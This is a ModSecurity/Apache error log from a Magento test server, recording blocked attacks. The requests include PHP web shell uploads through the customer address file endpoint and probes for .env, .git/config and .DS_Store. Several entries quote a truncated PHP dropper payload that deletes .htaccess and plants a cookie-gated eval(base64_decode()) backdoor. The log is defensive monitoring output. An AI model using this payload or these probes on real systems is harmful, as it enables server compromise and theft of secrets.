[Wed Jan 14 16:32:22.420786 2026] [:error] [pid 1400438] [client 46.149.66.101:35036] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 1q88364f428d25.php8 found within FILES:custom_attributes[country_id]: 1q88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWe3BkBaCnzgGdZXs4_hKQAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/1/q/1q88364f428d25.phar
[Wed Jan 14 16:32:22.421403 2026] [:error] [pid 1400438] [client 46.149.66.101:35036] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWe3BkBaCnzgGdZXs4_hKQAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/1/q/1q88364f428d25.phar
[Wed Jan 14 16:32:22.421561 2026] [:error] [pid 1400438] [client 46.149.66.101:35036] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWe3BkBaCnzgGdZXs4_hKQAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/1/q/1q88364f428d25.phar
[Wed Jan 14 16:32:22.718332 2026] [:error] [pid 1400438] [client 46.149.66.101:35036] [client 46.149.66.101] ModSecurity: Rule 7fa9a3bf3be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/1/q/1q88364f428d25.php8"] [unique_id "aWe3BkBaCnzgGdZXs4_hKgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 14 16:32:22.718816 2026] [:error] [pid 1400438] [client 46.149.66.101:35036] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/1/q/1q88364f428d25.php8"] [unique_id "aWe3BkBaCnzgGdZXs4_hKgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 14 16:32:22.721078 2026] [:error] [pid 1400438] [client 46.149.66.101:35036] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/1/q/1q88364f428d25.php8"] [unique_id "aWe3BkBaCnzgGdZXs4_hKgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 14 16:32:22.721241 2026] [:error] [pid 1400438] [client 46.149.66.101:35036] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/1/q/1q88364f428d25.php8"] [unique_id "aWe3BkBaCnzgGdZXs4_hKgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 15 13:25:47.824050 2026] [:error] [pid 1422355] [client 185.65.202.110:49664] [client 185.65.202.110] ModSecurity: Rule 7f3054ae2be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/r/er88364f428d25.phar"] [unique_id "aWjcyy53m_0LZQFyCeSgyAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 15 13:25:47.824540 2026] [:error] [pid 1422355] [client 185.65.202.110:49664] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/r/er88364f428d25.phar"] [unique_id "aWjcyy53m_0LZQFyCeSgyAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 15 13:25:47.827002 2026] [:error] [pid 1422355] [client 185.65.202.110:49664] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/r/er88364f428d25.phar"] [unique_id "aWjcyy53m_0LZQFyCeSgyAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 15 13:25:47.827196 2026] [:error] [pid 1422355] [client 185.65.202.110:49664] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/r/er88364f428d25.phar"] [unique_id "aWjcyy53m_0LZQFyCeSgyAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 15 13:25:47.966808 2026] [:error] [pid 1422355] [client 185.65.202.110:49664] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: er88364f428d25.php8 found within FILES:custom_attributes[country_id]: er88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWjcyy53m_0LZQFyCeSgyQAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/e/r/er88364f428d25.phar
[Thu Jan 15 13:25:47.967521 2026] [:error] [pid 1422355] [client 185.65.202.110:49664] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWjcyy53m_0LZQFyCeSgyQAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/e/r/er88364f428d25.phar
[Thu Jan 15 13:25:47.967692 2026] [:error] [pid 1422355] [client 185.65.202.110:49664] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWjcyy53m_0LZQFyCeSgyQAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/e/r/er88364f428d25.phar
[Thu Jan 15 13:25:48.088333 2026] [:error] [pid 1422355] [client 185.65.202.110:49664] [client 185.65.202.110] ModSecurity: Rule 7f3054ae2be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/r/er88364f428d25.php8"] [unique_id "aWjczC53m_0LZQFyCeSgygAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 15 13:25:48.088802 2026] [:error] [pid 1422355] [client 185.65.202.110:49664] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/r/er88364f428d25.php8"] [unique_id "aWjczC53m_0LZQFyCeSgygAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 15 13:25:48.091282 2026] [:error] [pid 1422355] [client 185.65.202.110:49664] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/r/er88364f428d25.php8"] [unique_id "aWjczC53m_0LZQFyCeSgygAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 15 13:25:48.091478 2026] [:error] [pid 1422355] [client 185.65.202.110:49664] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/r/er88364f428d25.php8"] [unique_id "aWjczC53m_0LZQFyCeSgygAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 16 01:18:14.264668 2026] [authz_core:error] [pid 1440268] [client 146.190.242.161:33968] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Jan 16 01:18:17.260753 2026] [:error] [pid 1440270] [client 146.190.242.161:34004] [client 146.190.242.161] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWmDyWzlpPP9wr_ziLEYzgAAAAQ"]
[Fri Jan 16 01:18:17.261863 2026] [:error] [pid 1440270] [client 146.190.242.161:34004] [client 146.190.242.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWmDyWzlpPP9wr_ziLEYzgAAAAQ"]
[Fri Jan 16 01:18:17.262015 2026] [:error] [pid 1440270] [client 146.190.242.161:34004] [client 146.190.242.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWmDyWzlpPP9wr_ziLEYzgAAAAQ"]
[Fri Jan 16 01:18:18.265874 2026] [:error] [pid 1440267] [client 146.190.242.161:34012] [client 146.190.242.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWmDyjk05LoBOh83Ib_SjgAAAAE"]
[Fri Jan 16 01:18:18.266106 2026] [:error] [pid 1440267] [client 146.190.242.161:34012] [client 146.190.242.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWmDyjk05LoBOh83Ib_SjgAAAAE"]
[Fri Jan 16 01:18:18.266303 2026] [:error] [pid 1440267] [client 146.190.242.161:34012] [client 146.190.242.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWmDyjk05LoBOh83Ib_SjgAAAAE"]
[Fri Jan 16 01:18:20.264607 2026] [:error] [pid 1440269] [client 146.190.242.161:34028] [client 146.190.242.161] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWmDzDttfPOmJvTw28h56QAAAAM"]
[Fri Jan 16 01:18:20.264847 2026] [:error] [pid 1440269] [client 146.190.242.161:34028] [client 146.190.242.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWmDzDttfPOmJvTw28h56QAAAAM"]
[Fri Jan 16 01:18:20.264998 2026] [:error] [pid 1440269] [client 146.190.242.161:34028] [client 146.190.242.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWmDzDttfPOmJvTw28h56QAAAAM"]
[Fri Jan 16 16:17:52.712640 2026] [:error] [pid 1444034] [client 46.149.66.101:37154] [client 46.149.66.101] ModSecurity: Rule 7f7c60c55be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/5/a588364f428d25.phar"] [unique_id "aWpWoORfEYyDES-ZFL4mywAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 16 16:17:52.713130 2026] [:error] [pid 1444034] [client 46.149.66.101:37154] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/5/a588364f428d25.phar"] [unique_id "aWpWoORfEYyDES-ZFL4mywAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 16 16:17:52.715446 2026] [:error] [pid 1444034] [client 46.149.66.101:37154] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/5/a588364f428d25.phar"] [unique_id "aWpWoORfEYyDES-ZFL4mywAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 16 16:17:52.715620 2026] [:error] [pid 1444034] [client 46.149.66.101:37154] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/5/a588364f428d25.phar"] [unique_id "aWpWoORfEYyDES-ZFL4mywAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 16 16:17:52.951406 2026] [:error] [pid 1444034] [client 46.149.66.101:37154] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: a588364f428d25.php8 found within FILES:custom_attributes[country_id]: a588364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWpWoORfEYyDES-ZFL4mzAAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/a/5/a588364f428d25.phar
[Fri Jan 16 16:17:52.952031 2026] [:error] [pid 1444034] [client 46.149.66.101:37154] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWpWoORfEYyDES-ZFL4mzAAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/a/5/a588364f428d25.phar
[Fri Jan 16 16:17:52.952210 2026] [:error] [pid 1444034] [client 46.149.66.101:37154] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWpWoORfEYyDES-ZFL4mzAAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/a/5/a588364f428d25.phar
